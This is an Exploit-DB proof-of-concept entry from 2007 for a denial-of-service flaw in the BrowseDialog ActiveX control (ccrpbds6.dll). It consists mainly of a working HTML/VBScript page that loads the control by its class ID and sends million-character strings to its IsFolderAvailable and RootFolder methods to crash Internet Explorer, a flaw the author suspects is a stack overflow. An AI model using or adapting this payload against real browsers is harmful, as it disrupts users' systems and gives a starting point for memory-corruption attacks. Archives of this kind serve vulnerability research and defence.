BrowseDialog Class - 'ccrpbds6.dll' Multiple Denial of Service Vulnerabilities

ID EDB-ID:3350
Type exploitdb
Reporter shinnai
Modified 2007-02-21T00:00:00


<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-----------------------------------------------------------------------------
 BrowseDialog Class (ccrpbds6.dll) multiple methods Denial of Service
 author: shinnai
 mail: shinnai[at]autistici[dot]org
 Soundtrack: "Zeta Reticoli" (Meganoidi)
 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
 I found other two methods in this dll that are unable to handle long string.
 It seems to be a Stack Overflow, but I'm not sure of this :)

<object classid='clsid:19E6E148-BAEC-11D2-B03A-EAFC20524153' id='BrowseDialog'></object>
<select style="width: 404px" name="Pucca">
  <option value = "IsFolderAvailable">IsFolderAvailable</option>
  <option value = "RootFolder">RootFolder</option>
  <option value = "Quoting">Quoting...</option>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language='vbscript'>
 Sub tryMe
  on error resume next
   if Pucca.value="IsFolderAvailable" then
     argCount   = 1
     arg1=String(1000000, "A")
     BrowseDialog.IsFolderAvailable arg1
     BrowseDialog.IsFolderAvailable arg1
   elseif Pucca.value="RootFolder" then
     argCount   = 1
     arg1=String(1000000, "A")
     BrowseDialog.RootFolder = arg1
     BrowseDialog.RootFolder = arg1
     MsgBox "Brucia ancora che prima o poi ritornerò" & vbCrLf & _
     "Conservo di nascosto sempre lo stesso smalto" & vbCrLf &_
     "Non temere zeta reticoli on my mind" & vbCrLf &_
     "Aspetterò il momento per un migliore slancio"
   end if
 End Sub

# [2007-02-21]